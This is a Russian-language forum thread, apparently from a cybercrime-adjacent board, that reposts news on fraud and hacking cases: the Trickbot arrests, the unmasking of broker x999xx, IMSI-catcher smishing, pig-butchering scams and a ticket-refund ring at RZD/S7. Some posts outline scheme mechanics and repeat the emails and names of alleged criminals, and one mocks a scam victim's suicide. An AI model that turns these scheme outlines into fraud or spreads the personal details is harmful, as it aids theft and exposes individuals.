В ОАЭ в ходе масштабной операции были ликвидированы крупные киберпреступные синдикаты. В результате ночного рейда были арестованы сотни киберпреступников, а также спасены многочисленные жертвы преступной деятельности. Операция стала результатом расследования, проведённого Khaleej Times, которое раскрыло всю схему мошенничества.
Одной из крупнейших операций стал рейд в эмирате Аджман. Силовики штурмовали торговый центр Grand Mall и несколько жилых башен, в которых базировались мошенники. Операция привела к аресту сотен подозреваемых. Рейды проводились и в других местах Дубая, включая комплекс Rahaba Residences в регионе Dubailand.
Киберпреступники под различными ложными предлогами заманивали тысячи людей, среди которых было много выходцев из Южной Азии и Африки. Мошеннические центры имели строгую иерархию, в которой агенты по продажам колл-центра занимали нижние ступени, а «киллеры» — опытные мошенники — верхние.
Один из агентов по продажам рассказал, что кураторы называли их «открывающими игроками». Сотрудники колл-центра делали первые звонки, начинали разговор и поручали людям простые задачи, такие как публикация отзывов на Google и лайки видео на YouTube. Кураторы следили за звонками, чтобы агенты следовали скрипту, который отображался на экране компьютера.
Когда доверие было завоёвано и вовлечённость людей углублялась, жертв добавляли в группу Telegram с сотнями участников, где дальше проводились преступные схемы обмана. По словам задержанных, мошенники ежедневно обманывали сотни людей, и когда незаконные доходы превышали 100 000 дирхамов (около $27 200), в комнате звучали заранее записанные аплодисменты и крики одобрения.
В результате расследования выяснилось, что среди арестованных было 37 граждан Шри-Ланки, задержанных по обвинениям, включающим киберпреступления и проституцию. Все они будут депортированы в течение 2-х недель. На данный момент 11 граждан Шри-Ланки уже были возвращены в страну, и еще 15 ожидают депортации.
До пандемии Covid-19 мошенники базировались в нескольких азиатских странах, однако преследование за ними заставило синдикаты искать новые убежища. Операция в ОАЭ является значительным шагом в борьбе с киберпреступностью и спасением тех, кто был втянут в мошеннический синдикат с нечеловеческими условиями.
• Source: https://www.khaleejtimes[.]com/uae/crime/uae-hundreds-arrested-in- all-night-operation-as-international-cybercrime-syndicates-dismantled
Во всей инфраструктуре Microsoft произошел «глобальный сбой»
Не работают абсолютно все продукты Microsoft, что приводит к серьезным сбоям в работе банков, коммунальных предприятий, авиакомпаний, средств массовой информации, телекоммуникаций, сотовой связи, Интернета и многое другое.
— United Airlines и Delta Airlines приостановили полеты из-за проблем со связью, возникших в результате продолжающегося глобального сбоя — Федеральное управление гражданской авиации США;
— Индийский новостной канал Times Now сообщает, что причиной глобального сбоя является «недавнее обновление CrowdStrike»;
— Turkish Airlines также приостановила полеты из-за «большого глобального сбоя»;
— Во всех аэропортах Испании произошел «инцидент с компьютерными системами» после сбоя CrowdStrike;
— Британский телеканал SkyNews был отключен от сети из-за глобального сбоя;
— Несколько аэропортов Великобритании также были вынуждены приостановить полеты.
Сотрудники Управления уголовного розыска ГУ МВД России по городу Санкт- Петербургу и Ленинградской области в результате проведения комплекса оперативно-розыскных мероприятий задержали двух петербуржцев 33 и 34 лет, совершивших 8 эпизодов мошенничеств.
Установлено, что фигуранты разместили на интернет-сервисе объявлений информацию о продаже бытовок и морских контейнеров. Потенциального покупателя злоумышленники убеждали в необходимости полной оплаты заказа. После того как они получали деньги, номер телефона покупателя блокировался, в результате потерпевшие оставались без денег и товара.
По предварительным данным, за период с марта 2023 года по январь 2024 года сообщники обманули 8 петербуржцев. Общая сумма причинённого гражданам ущерба составила почти полмиллиона рублей.
Следственными подразделениями полиции различных районов Санкт-Петербурга и Ленобласти по всем фактам были возбуждены уголовные дела по части 4 статьи 159 УК РФ, которые объединены в одно производство. Подозреваемые задержаны на основании статьи 91 УПК РФ.
По адресам проживания задержанных проведены обыски, в ходе которых обнаружены и изъяты 50 банковских карт, 15 мобильных телефонов, 3 ноутбука, планшет и 2 компьютера.
Проведение оперативно-следственных мероприятий продолжается. Устанавливается причастность злоумышленников к другим аналогичным преступлениям.
"Криптофишинговый сервис Angel Drainer приостановил оказание услуг после установления личностей его организаторов исследователями кибербезопасности из Match Systems"
Сурс:
__https://twitter.com/x/status/1813240526977593467
Странно что тут нигде этой новости нет и не обсуждают, решил добавить.
Гражданин России, проживающий в Якутском регионе России и в Юго-Восточной Азии, впервые предстал перед федеральным судом сегодня после его экстрадиции из Республики Корея в Северный округ Огайо, где ему были предъявлены обвинения в его предполагаемой роли в транснациональной киберпреступной деятельности. организация.
Согласно судебным документам, 38-летний Владимир Дунаев был членом транснациональной киберпреступной организации, развернувшей троян для компьютерных банковских операций и набор вредоносных программ-вымогателей, известных как «Trickbot».
«Trickbot атаковал предприятия и жертв по всему миру и заразил миллионы компьютеров с целью кражи и выкупа, включая сети школ, банков, муниципальных органов власти и компаний в сфере здравоохранения, энергетики и сельского хозяйства», - сказала заместитель генерального прокурора Лиза О. Монако. «Это второй обвиняемый в отношении Trickbot, арестованный за последние месяцы, что дает понять, что с нашими международными партнерами Министерство юстиции может и будет задерживать киберпреступников по всему миру. Это еще один успех недавно созданной Департаментом целевой группы по программам-вымогателям и цифровому вымогательству в ликвидации групп программ-вымогателей и разрушении экосистемы киберпреступников, которая позволяет программам-вымогателям существовать и угрожать нашей критически важной инфраструктуре ».
«ФБР преисполнено решимости использовать наши уникальные инструменты и возможности для противодействия транснациональным киберпреступным организациям, таким как группа, которая разработала и предоставила Trickbot, и по-прежнему привержена навязыванию риска и последствий для этих преступников»,
«Вредоносное ПО Trickbot было разработано для кражи личной и финансовой информации миллионов людей по всему миру, тем самым нанося значительный финансовый ущерб и нанося значительный ущерб критически важной инфраструктуре в Соединенных Штатах и за рубежом», - заявила исполняющая обязанности прокурора США Бриджит М. Бреннан из Северный округ Огайо. «Сегодняшнее объявление подчеркивает, насколько далеко готовы пойти представители федеральных правоохранительных органов и наши международные партнеры, чтобы привлечь этих предполагаемых киберпреступников к ответственности за их действия».
«Это обвинение отражает динамичный ландшафт, в котором международные преступники используют изощренные кибер-методы, чтобы воспользоваться и обмануть ничего не подозревающих жертв в любой точке мира», - сказал специальный агент Эрик Смит из полевого офиса ФБР в Кливленде. «Это многолетнее расследование демонстрирует стремление ФБР агрессивно преследовать этих людей, несмотря на сложность и глобальный характер кибер-расследований, которые так часто могут возникнуть. ФБР призывает любую жертву кибермошенничества подавать заявление в Центр рассмотрения жалоб на Интернет- преступления ФБР по адресу www.ic3.gov ».
В обвинительном заключении утверждается, что начиная с ноября 2015 года и до августа 2020 года Дунаев и другие похитили деньги, конфиденциальную информацию и повредили компьютерные системы у ничего не подозревающих жертв, включая физических лиц, финансовые учреждения, школьные округа, коммунальные предприятия, государственные учреждения и частный бизнес. . Чтобы увековечить свою преступную схему, обвиняемые якобы использовали сеть сообщников и внештатных программистов, известную как Trickbot Group, для создания, развертывания и управления вредоносным ПО Trickbot, которое заразило миллионы компьютеров и компьютерных систем по всему миру.
Дунаев якобы был одним из таких сообщников, работая разработчиком вредоносных программ для Trickbot Group. Дунаев якобы выполнял различные функции разработчика для поддержки вредоносного ПО Trickbot, включая управление его выполнением, разработку популярных модификаций браузера и помощь в сокрытии вредоносного ПО от обнаружения программным обеспечением безопасности.
Ранее в этом году Министерство юстиции объявило об аресте и привлечении к уголовной ответственности Аллы Витте, гражданки Латвии, обвиненной в ее участии в Trickbot Group.
Согласно судебным документам, вредоносная программа Trickbot была разработана для захвата учетных данных для входа в онлайн-банкинг и сбора другой личной информации, включая номера кредитных карт, электронные письма, пароли, даты рождения, номера социального страхования и адреса с зараженных компьютеров с помощью веб-инъекций. и регистрация нажатия клавиш. Более поздние версии Trickbot были адаптированы для облегчения установки и использования программ- вымогателей.
Согласно обвинительному заключению, ответчики использовали эти украденные учетные данные для входа и другую личную информацию, чтобы получить доступ к онлайн-банковским счетам, выполнить несанкционированные электронные переводы средств и отмыть деньги через счета получателей в США и за рубежом.
Дунаев был экстрадирован из Республики Корея 20 октября. Ему предъявлено обвинение в заговоре с целью совершения компьютерного мошенничества и кражи личных данных при отягчающих обстоятельствах, в заговоре с целью совершения мошенничества с использованием электронных средств и банковских операций, в заговоре с целью отмывания денег, а также в многочисленных пунктах мошенничества с использованием электронных средств связи и банковском мошенничестве. , и кража личных данных при отягчающих обстоятельствах. В случае признания виновным по всем пунктам обвинения Дунаеву грозит максимальное наказание в виде 60 лет лишения свободы. Судья федерального окружного суда выносит решение по любому приговору после рассмотрения Руководящих принципов вынесения приговоров в США и других законодательных факторов.
Этот случай расследовал полевой офис ФБР в Кливленде.
Управление по международным делам Министерства юстиции оказало неоценимую помощь в обеспечении ареста и экстрадиции Дунаева в Соединенные Штаты при существенной поддержке со стороны Республики Корея.
Старший юрисконсульт CS Heath отдела компьютерных преступлений и интеллектуальной собственности и помощники прокуроров США Дэниел Дж. Ридл и Дункан Т. Браун из Северного округа Огайо ведут судебное преследование.
Это дело является частью Целевой группы Министерства юстиции по программам- вымогателям и цифровому вымогательству, которая была создана для борьбы с растущим числом атак с использованием программ-вымогателей и цифрового вымогательства. В рамках Целевой группы Отдел по уголовным делам, работая с прокуратурой США, уделяет приоритетное внимание срыву, расследованию и судебному преследованию в отношении программ-вымогателей и цифрового вымогательства путем отслеживания и прекращения разработки и развертывания вредоносного ПО, выявления виновных киберпреступников и привлечение этих лиц к ответственности за свои преступления. Департамент через Целевую группу также стратегически нацелен на криминальную экосистему программ-вымогателей в целом и сотрудничает с национальными и зарубежными государственными учреждениями, а также с партнерами из частного сектора для борьбы с этой серьезной преступной угрозой.
Обвинительное заключение - это просто утверждение, и все обвиняемые считаются невиновными до тех пор, пока их вина не будет доказана вне разумных сомнений в суде.
sc: justice[.]gov/opa/pr/russian-national-extradited-united-states-face- charges-alleged-role-cybercriminal
Роскомнадзор разрабатывает новые меры для борьбы с телефонным мошенничеством. Об этом сообщил начальник управления контроля и надзора в сфере связи ведомства Максим Прыткин.
Одним из предложенных решений является запрет звонков через мессенджеры на территории России, если их владельцы не будут проверять номера телефонов совместно с операторами связи. Эта мера, по мнению специалистов, поможет значительно снизить количество мошеннических звонков, так как злоумышленники часто используют мессенджеры для совершения своих преступных действий, оставаясь при этом анонимными.
Максим Прыткин подчеркнул, что мошенничество через мессенджеры становится все более изощренным, и для защиты граждан необходимо предпринять решительные шаги. Он также отметил, что Роскомнадзор тесно сотрудничает с операторами связи и разработчиками мессенджеров для разработки эффективных мер борьбы с мошенничеством.
Согласно данным Роскомнадзора, число случаев телефонного мошенничества в последние годы значительно возросло. Мошенники используют различные схемы, включая звонки под видом сотрудников банков, правоохранительных органов и других официальных структур, чтобы выманить у граждан личные данные или деньги.
На фоне этих событий Роскомнадзор также активно занимается модернизацией системы защиты от мошенничества. В частности, рассматривается возможность создания единой базы данных телефонных номеров, которые были замечены в мошеннических действиях. Такая база позволит быстрее выявлять и блокировать подозрительные звонки.
Недавно мы сообщали о том, что Роскомнадзор планирует усилить контроль за использованием виртуальных номеров, которые часто применяются мошенниками. По словам представителей ведомства, в ближайшее время будут внедрены новые механизмы идентификации пользователей таких номеров.
Большинство опытных киберпреступников часто скрывают свою настоящую личность, используя псевдонимы. Однако некоторые хакеры не особо заботятся о своей анонимности. Один из таких примеров – хакер x999xx, который предоставляет доступ к корпоративным сетям для различных вымогательских групп. Подробности о жизни хакера раскрыл Брайан Кребс в своем блоге.
Хакер x999xx, известный брокер первоначального доступа (Initial Access Broker, IAB), продает учетные данные для удаленного доступа и базы данных с личной и финансовой информацией. В феврале 2019 года аналитическая компания Flashpoint назвала x999xx одним из самых активных участников киберпреступного форума Exploit, где он регулярно продавал украденные базы данных и сетевые учетные записи.
В августе 2023 года x999xx продал доступ к компании, разрабатывающей программное обеспечение для сферы недвижимости. В июле 2023 года он предложил на продажу номера социального страхования, имена и даты рождения граждан одного из штатов США. В июне 2023 года x999xx выставил на продажу 80 баз данных крупнейшей австралийской розничной компании.
Хакер x999xx начал свою деятельность в 2009 году на форуме Verified под адресом maxnm@ozersk[.]com, который более 10 лет назад использовался для создания учетной записи во ВКонтакте под именем Максим Кирцов из Озерска. В профиле «maxnm» указана дата рождения 5 сентября 1991 года. В 2014 году Кирцов зарегистрировался на форуме Zloy с адресом maxnmalias-1@yahoo[.]com, который позже использовался для создания учетной записи на cdek.ru под именем Максим Георгиевич Кирцов.
До 2009 года x999xx использовал псевдоним Maxnm на различных русскоязычных киберпреступных форумах, таких как Spamdot, Exploit и Damagelab. Поиск по имени Кирцов Максим Георгиевич выявил множество учетных записей, зарегистрированных на адрес maksya@icloud[.]com. Адрес использовался 10 лет назад для создания аккаунта на imageshack[.]com под именем x999xx, где размещены скриншоты банковских счетов, переписки с другими хакерами и взломанных сайтов.
На странице Кирцова во ВКонтакте также можно найти фотографии автомобилей и домашних растений, совпадающие с фотографиями на аккаунте imageshack. В 2012 году Кирцов был сотрудником Озерского технологического института Национального исследовательского ядерного университета.
На странице Вконтакте в качестве рода занятий Кирцова указан сайт под названием ozersk[.]today, который на первый взгляд выглядит как блог о жизни в Озерске. Однако в 2019 году ИБ-компания Recorded Future обнаружила, что этот домен использовался для размещения сервера Cobalt Strike.
По данным сервиса DomainTools.com, ozersk[.]today был зарегистрирован на адрес электронной почты dashin2008@yahoo.com , который также использовался для регистрации примерно 20 других доменов, включая x999xx[.]biz. Практически все домены были зарегистрированы на Максима Кирцова.
В переписке с KrebsOnSecurity Кирцов подтвердил, что он является x999xx. Максим не считает себя виновным в вымогательстве, а больше сосредоточен на сборе данных. В своих постах на форумах Кирцов упоминал, что никогда не атакует объекты в своей стране и не боится преследования, пока его деятельность направлена на иностранные цели.
История x999xx напоминает о том, что многие киберпреступники считают себя неприкосновенными, пока остаются на определенной территории. Несмотря на это, западные правоохранительные органы применяют психологические операции для борьбы с такими преступниками, внедряясь в их сети и нарушая их доверие друг к другу.
Таким образом и поступили с LockBit, захватив инфраструктуру группы. Кроме того, в мае в рамках операции Endgame было захвачено более 100 серверов, используемых для крупных вредоносных кампаний с использованием таких программ, как IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader и SystemBC.
• Source: https://krebsonsecurity[.]com/2024/07/the-not-so-secret-network- access-broker-x999xx/
• Source: https://www.securitylab[.]ru/news/549803.php
особенно красиво звучит "самодельная мобильная антенна"
интересно, на базе чего это было сделано, для 2g сети...
В Великобритании арестованы двое подозреваемых, которые использовали «самодельную мобильную антенну» для рассылки тысяч фишинговых SMS. Правоохранители считают, что в сообщениях подозреваемые выдавали себя за банки «и другие официальные организации».
Лондонская полиция [сообщает](https://www.cityoflondon.police.uk/news/city-of- london/news/2024/june/two-people-arrested-in-connection-with-investigation- into-homemade-mobile-antenna-used-to-send-thousands-of-smishing-text-messages- to-the-public), что 32-летний Хуайонг Сюй (Huayong Xu) и второй подозреваемый, чье имя не раскрывается, использовали самодельное устройство для массовой рассылки текстовых сообщений, при этом каким-то образом обходя защиту операторов от смишинга (фишинга с помощью SMS) и пытаясь обманом вынудить получателей раскрыть личные данные. Подчеркивается, что это первый подобный случай в Великобритании.
«Злоумышленники, совершающие подобные преступления, становятся все умнее и действуют все более сложными способами, чтобы обманывать неосведомленных людей и похищать все, что попадет им в руки. Помните, что банк и любой другой официальный орган не будут просить вас поделиться личной информацией через SMS или телефону», — пишут правоохранители.
Click to expand...
Подобные атаки возможны благодаря давно известным уязвимостям в стандартах мобильной связи, в частности, существует требование для мобильных устройств, которые обязаны аутентифицировать себя в сетях посредством IMSI, но при этом сети не обязаны аутентифицировать себя в ответ.
В итоге устройства, подключившиеся к фальшивой базовой станции, почти сразу могут получить фишинговое сообщение. Хотя полиция описывает созданное подозреваемыми устройство как «самодельное», не так сложно построить так называемый IMSI-перехватчик (IMSI-catcher) с помощью свободно доступного в продаже радиооборудования.
Эмуляторы базовых станций, через которые обычно осуществляется перехват соединений, называют Stingray или IMSI-перехватчик. По сути, это устройство, которое маскируется под вышку сотовой связи, заставляя устройства в зоне досягаемости подключаться именно к нему. IMSI-перехватчики нередко используются и самими правоохранительными органами для триангуляции целевых устройств, а иногда и для перехвата их коммуникаций.
И хотя британские власти сообщают, что это первый подобный случай в стране, в мировой практике похожие инциденты происходили не раз. К примеру, в прошлом году Министерство информации и коммуникаций Вьетнама [выпустило предупреждение](https://congan.quangnam.gov.vn/Default.aspx?tabid=63&Group=56&NID=9815&khoi- to-vu-an-bi-can-bat-tam-giam-2-doi-tuong-xam-nhap-trai-phep-mang-may-tinh- mang-vien-thong-hoac-phuong-tien-dien-tu-cua-nguoi-khac) о поддельных базовых станциях и арестовало двух мужчин, которые аналогичным образом перехватывали IMSI находящихся поблизости устройств для рассылки фишинговых сообщений.
Другой похожий случай произошел в декабре 2022 года, когда французская полиция обнаружила IMSI-перехватчик, который женщина [возила с собой по Парижу](https://www.francetvinfo.fr/faits-divers/escroquerie-aux-sms-de-l- assurance-maladie-les-suspects-volaient-les-numeros-de-telephone-depuis-leur- voiture_5665943.html). С помощью этого устройства распространялись сообщения, призывающие парижан делиться своими личными данными на фейковом сайте медицинского страхования. Как выяснилось позже, эта же группировка была связана с еще одним IMSI-перехватчиком, который перевозили по городу в старой машине скорой помощи.
Наконец, в 2023 году полиция Норвегии арестовала гражданина Малайзии, которого заподозрили в шпионаже. Дело в том, что тогда был обнаружен IMSI-перехватчик, работающий вблизи от нескольких секретных объектов, включая офис премьер- министра и министерство обороны страны. В январе текущего года мужчину [приговорили](https://www.vg.no/nyheter/i/XbyGbr/mann-doemt-til-tre-aars- fengsel-for-massebedragerier-i-oslo-og-bergen) к трем годам тюремного заключения.
источник текста - xakep.ru
82-летний Джонс из штата Вирджиния стал жертвой «забоя свиней» — он познакомился в Facebook (запрещен в РФ, все дела) с симпатичной тяночкой по имени Джесси, которая была в 3 раза моложе его. На протяжении нескольких месяцев тян поднимала пожилую бебру, параллельно уговаривая старика вложить бóльшую часть своих сбережений в фейковый криптопроект. На этом скамерсвумен не остановилась и постепенно вытянула у деда все до последнего цента.
По словам дочери горе-инвестора, она заметила, что обычно общительный и жизнерадостный Джонс начал отдаляться от семьи. Они решили позвать отца на встречу, чтобы выяснить причину происходящего и поддержать его, но к этому моменту было уже некого приглашать — несчастный пенс повесился у себя в ванной.
После смерти бедолаги семья обнаружила душераздирающую переписку с мошенницей:
"Похоже на то, что моя финансовая жизнь подошла к концу. Больнее всего
осознавать то, что я предал доверие своей семьи. Это невыносимо."
— написал он в одном из сообщений.
Печальную историю Джонса тяжело назвать уникальной — по данным ФБР, в 2023 году криптоскамеры украли $5 млрд, из которых $3,96 млрд пришлось на схему «забой свиней» (почти 4 миллиарда на такую примитивную темку, Карл!). Прокурор Эрин Уэст, занимающаяся борьбой с вышеописанным видом мошенничества отметила, что участники данной схемы — это "жертвы, которые делают жертвами других" и что "единственными победителями здесь являются китайские бандиты".
А теперь иди и проверь с кем переписывается твой дед в Одноклассниках.
Бортпроводница авиакомпании Air India Express перевозила в заднице один
килограмм золота.
26-летняя девушка подрабатывала «мулом» контрабандистов и за каждую такую посылку получала комиссионные.
В этот раз из ее ануса извлекли 960 граммов золота в форме слитка.
Преображенский суд Москвы отправил под стражу 50-летнего Илью Васильева,
обвиняемого по п. «д» ч. 2 ст. 207.3 УК РФ (распространение «фейков» про армию
по мотивам политической, идеологической, расовой, национальной или религиозной
ненависти) до 20 августа. Васильева обвиняют из-за постов в «Facebook», где он
разместил публикацию, «дискредитирующую Вооруженные силы РФ». Адвокат Оскар
Черджиев рассказал корреспонденту «Медиазоны», что причиной уголовного дела
стали два поста, написанные в соцсети на английском языке. Их нашли в изъятой
у Васильева год назад технике —
в мае 2023 года у него конфисковали телефон во время осмотра квартиры. Тогда
суд оштрафовал его на 40 тысяч рублей по протоколу о «дискредитации» армии из-
за поста во «ВКонтакте», после этого программист удалил все публикации из
соцсетей и свой аккаунт ВК.
Васильев известен в сети под именем Арви Хэккер — еще в 90-е он открыл в Москве «Гражданскую школу хэкеров» (Васильев произносит свой ник и «хакинг» через букву «э»), где противопоставлял хакерство «печальной криминализации компьютерного подполья». В тот период Васильев активно общался со СМИ, участвовал в телешоу о хакерах и называл себя основателем российской школы хакеров, тогда же о нем появилась статья на «Луркоморье». Васильев придерживается левых взглядов, в последние годы он критиковал действующие власти, осуждал начало боевых действий в Украине, до начала СВО активно выходил на протесты.
Хакер из американского Детройта присягнул на верность террористической организации «Исламское государства» и обратился к ним с предложением создать киберподразделение группировки. Все это время он общался с сотрудниками ФБР под прикрытием.
В феврале 2023 года Джибрил Пратт вышел на связь с сотрудниками ФБР, которые, как он полагал, помогали террористам в организации поездок. Он сообщил агентам под прикрытием, что хотел бы покинуть США, потому что живущие в стране люди — «дикари и бешеные собаки», а также поклялся в верности «Исламскому государству». Всю переписку он вел в мессенджере WhatsApp.
В частности, согласно попавшим в распоряжение журналистов материалам суда, Пратт представил планы использования дронов-смертников и автомобилей с дистанционным управлением, вооруженных взрывчаткой. Он также предположительно отправлял платежи в криптовалюте, шедшие, как полагал хакер, на финансирование террористов. На самом же деле деньги оседали на спецсчетах ФБР.
Пратта также обвиняют в незаконной киберпреступной деятельности, связанной с площадкой Genesis. C 2018 года агенты ФБР закупили около 115 пакетов учетных данных, получив также различные сведения с серверов маркета. Они содержали информацию о пользователях, в том числе о Marcuss23. Он искал данные банковских и криптовалютных счетов американцев, купив в итоге сведения о 14 тысячах учеток. Силовики отследили депозиты в биткойнах, которые этот пользователь внес на Genesis, до учетной записи Coinbase. Сама биржа предоставила имя владельца этих счетов, которым и оказался Пратт.
В августе 2023 года ему было предъявлено обвинение. Сразу после этого он связался якобы со своим контактом в «Исламском государстве», на самом деле являвшимся агентом ФБР, и написал ему удалить все переписки. После этого, оставаясь под домашним арестом, он пытался покинуть Соединенные Штаты, что не удалось сделать из-за конфискации паспорта.
Эксперты по расследованию киберпреступлений после публикации сведений о предполагаемых членах TrickBot, выявленных в ходе операции Endgame, обратили внимание на одного из фигурантов. Им стал россиянин Олег Кучеров ( KUCHEROV Oleg Vyacheslavovich ), скрывающийся под ником Gabr. По мнению ресерчера Анастасии Сенцовой, его история нетипична для русского хакера.
Кучеров, которому сейчас 51 год, присоединился к TrickBot в сентябре 2021 года в качестве программиста. Он быстро влился в команду, посвятив себя улучшению вредоносного ПО, которое использовалось во время многочисленных атак программ-вымогателей по всему миру. Его навыки, отработанные за годы работы в ИТ-секторе, сделали его ценным активом для TrickBot. Деятельность его предыдущей компании охватывала широкий спектр направлений, однако особое внимание уделялось эксплойтам и шифрованию.
Click to expand...
Она отметила, что анализ некоторых принадлежащих Кучерову криптовалютных счетов дает возможность предположить размер его заработной платы в первый год сотрудничества с TrickBot — 2500 долларов в месяц. И даже такие деньги обеспечивали ему достаточно комфортный образ жизни. В частности, Кучеров построил хороший частный дом, а также открыл предприятие, специализирующееся на производстве мясных продуктов.
Кучеров часто путешествует, в том числе неоднократно ездил в Италию и в ОАЭ в период с 2021-го по апрель 2024 года. Там он проводил отпуск и посещал IT- конференции, в том числе крупнейшую в Азии конференцию по международной безопасности. Он активно делился сведениями об этих поездках в социальных сетях, что удивительно, учитывая его причастность к киберпреступности.
Click to expand...
Автор также отдельно подчеркнула, что цифровые следы Кучерова указывают на поддержку им действий российского правительства и российской армии в военном конфликте на территории Украины. Сенцова в том числе на основании этого причислила разработчика к категории высокомерных хакеров, чье поведение не вписывается в стандартные представления об их типе личности.
x.com/intel_anastasia/status/1797607936572727353
bka.de/DE/IhreSicherheit/Fahndungen/Personen/BekanntePersonen/Endgame/KO/Fahndung_KO.html
Басманный суд Москвы начал рассматривать дело о создании преступного сообщества, которое заработало 17 млн руб. на фиктивных возвратах билетов РЖД и S7. Всего оно объединяет около 60 эпизодов мошенничества в отношении 31 компании. Членами предполагаемого организованного преступного сообщества были 29 человек, следует из обвинительного заключения, которое зачитала в суде 29 октября прокурор Диана Оганян. События дела относятся к 2013–2014 годам.
Из описанной гособвинением схемы следует, что выгоду от фиктивных возвратов могли получать не только мошенники, но и перевозчики. При этом в деле не утверждается, что у преступников были сообщники в структурах S7 и РЖД.
Это дело вела старший следователь по особо важным делам управления МВД на транспорте по Центральному федеральному округу Евгения Шишкина, застреленная в Подмосковье 10 октября. По данным «Новой газеты», одна из рассматриваемых версий ее убийства связана именно с этим расследованием. Издание упоминало, что в последнем деле Шишкиной шла речь о партнерской структуре РЖД — компании «Универсальная финансовая система» (УФС). «Известия» писали, что подозреваемым в организации убийства Шишкиной является бежавший в Черногорию Ярослав Сумбаев. В обвинительном заключении по делу о мошенничестве с билетами он назван организатором и лидером преступного сообщества.
Дело действительно вела следственная группа под руководством Шишкиной, подтвердил РБК адвокат одного из обвиняемых Николай Аршинов. О проверке Сумбаева или кого-либо из его сообщников на причастность к убийству Шишкиной их защите ничего не известно.
«Хулиган из Питера» и «ТС с огромной репой»
На скамье подсудимых три человека: 29-летний уроженец Кингисеппа Ленинградской области Максим Матюшев, 31-летний Андрей Жданов из Новосибирска и 32-летний москвич Кирилл Кулабухов. Все трое не признают вину. У Жданова среднее образование, а Матюшев и Кулабухов окончили по девять классов средней школы и были ранее судимы: один получил пять лет колонии в Красноярске, второй — такой же срок в Кингисеппе.
В 2012 году Матюшев на одном из интернет-форумов, где обсуждались схемы нелегального заработка в Сети, познакомился с Сумбаевым, утверждает следствие. И Сумбаев, и Матюшев тогда были в федеральном розыске по делам о мошенничестве — один, по версии следствия, устанавливал скимминговые устройства на банкоматы в торговых центрах, а второй похищал средства с банковских карт. Общаясь в мессенджере Jabber, они договорились работать вместе, следует из обвинительного заключения.
В результате, по версии следствия, сообщники взломали базы данных ООО «С7 билет» — структуры авиаперевозчика S7, а также компании «Универсальная финансовая система» — партнера РЖД. Так в распоряжении мошенников оказались логины и пароли корпоративных клиентов этих сервисов, и они смогли приобретать билеты на самолеты и поезда за счет множества юрлиц.
Билеты оформлялись на паспортные данные случайных людей, желающих подзаработать. В хакерской терминологии такие подставные лица называются «дропами», говорится в обвинительном заключении. В дальнейшем человек, предоставивший мошенникам свои паспортные данные, шел в кассу вокзала или аэропорта и оформлял возврат билета, получая наличные, которые затем поступали руководителям группы.
Функции «дроповода», то есть координатора группы «дропов», брали на себя Сумбаев и уроженец Саранска по фамилии Святкин, следует из обвинительного заключения. У Матюшева была функция «заливщика» — он внедрялся в базу, анализировал финансовое состояние юрлиц и выявлял те из них, за счет которых можно приобретать билеты. «Дропов» предполагаемые мошенники искали с помощью объявлений на форумах, при этом Матюшев использовал ник «ТС с огромной репой», а Сумбаев — «Хулиган из Питера».
Пять тысяч билетов
Сообщники условились, что 45% дохода достается Сумбаеву, 40% — Матюшеву, считает следствие. Еще 15% предназначались программисту, который сможет разработать софт для более быстрого подбора паролей и сбора идентификационных данных юрлиц (на первых этапах мошенники, по сути, подбирали пароли вручную).
Этим как раз и занялся найденный на одном из форумов Кулабухов. За основу он взял легальный софт, предназначенный для удаленного администрирования компьютерных сетей. Затем Кулабухов разослал на электронные адреса юрлиц из баз S7 и РЖД письма с вирусами. Если получатели их открывали, то хакер получал возможность подключиться к корпоративным сетям и иметь доступ к личным кабинетам кассиров. Далее хакеры от имени кассиров заполняли макеты электронных маршрутных квитанций данными «дропов» и проводили платежи.
В дальнейшем группа мошенников за счет вовлеченных в нее «дропов» выросла до двадцати с лишним человек и обзавелась разветвленной структурой с несколькими подразделениями, считает гособвинение. Хакеры действовали в Санкт-Петербурге, Уфе, Новосибирске, Алтайском крае и подмосковном Домодедово. Это позволяет утверждать, что речь идет о преступном сообществе, подчеркнула в суде прокурор Оганян. Некоторые из членов группировки уже осуждены: «дроповод» Святкин получил приговор еще в 2015 году.
Потерпевшими от действий мошенников гособвинение называет 31 компанию, в основном это туроператоры и логистические организации. Сильнее всего пострадали «В.И.П. СЕРВИС», «Интурист-Находка», «Виза конкорд трэвел», Приморское агентство авиационных компаний, «Старлайнер» и «С7 билет». Сумма ущерба в каждом случае составляет от нескольких десятков тысяч до 3,5 млн руб. Всего с июля 2013 по август 2014 года мошенники оформили за чужой счет более 5 тыс. электронных маршрутных квитанций, считает следствие.
УФС не была признана в деле потерпевшей стороной, но она «сотрудничала с транспортной полицией в рамках расследования деятельности кибермошенников», сообщили РБК в пресс-службе компании.
Выгода на возврате
В обвинительном заключении не утверждается, что корпорации получали какую-либо выгоду от схемы с возвратами билетов. Из него также не следует, что у мошенников были сообщники в структурах РЖД или S7. При возврате билета перевозчик, как правило, удерживает таксу и сервисные сборы. У S7 они зависят от тарифа, а у РЖД — от времени, оставшегося до начала поездки, и маршрута.
Как рассказал РБК адвокат Матюшева Николай Аршинов, следствие не спрашивало его подзащитного о возможных подельниках в РЖД или S7. «Конечно, в деле есть допросы сотрудников, которые принимали билеты и выплачивали денежные средства. Но есть правила, по которым перевозчики удерживают комиссию при возврате билета; они в любом случае действуют в соответствии с этими правилами. Понятно, что за билет деньги не возвращались в том же объеме, в каком были уплачены, всегда какой-то процент удерживался», — сказал адвокат.
В УФС отметили, что приняли меры для защиты данных, ввели двухфакторную аутентификацию и средства контроля IP-адреса, что позволило «свести практически на нет случаи взлома систем партнеров компании, своевременно информировать операторов, перевозчика и транспортную полицию о подозрительных действиях, а также помогло задерживать так называемых дропперов».
В пресс-службе РЖД отметили, что утечек персональных данных клиентов РЖД с официального сайта компании не было. «Любая другая форма продажи железнодорожных билетов осуществляется сторонними компаниями и может предусматривать агентский сбор», — отметили в РЖД.
• Video:
В последние месяцы российские дропы все чаще становятся фигурантами дел по факту незаконного обогащения. Тред об этом за авторством пользователя GramotnoSuvazheniem появился на darkmoney[.] Многие участники обсуждения признали, что ситуация в последнее время действительно усложнилась.
За этот май уже прилетело четыре исковых заявления четырем разным дропам, чьи карты были проданы почти год назад. Потерпевшие подают иск в суд на дропа и суд удовлетворяет этот иск. Идем к адвокату — он говорит: "Платить, без вариантов, суд удовлетворит иск потерпевшей стороны. Решайте вопрос в досудебном порядке, чтобы не было статьи у дропа.
Click to expand...
